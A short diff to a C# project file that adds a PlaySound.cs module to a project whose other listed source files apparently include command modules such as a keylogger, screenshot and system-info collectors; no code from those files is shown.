--- a/Commands/Commands.csproj
+++ b/Commands/Commands.csproj
@@ -58,6 +58,7 @@
     <Compile Include="GetOpenPrograms.cs" />
     <Compile Include="ICommand.cs" />
     <Compile Include="KeyLogger.cs" />
+    <Compile Include="PlaySound.cs" />
     <Compile Include="Properties\AssemblyInfo.cs" />
     <Compile Include="Screenshot.cs" />
     <Compile Include="SysInfo.cs" />
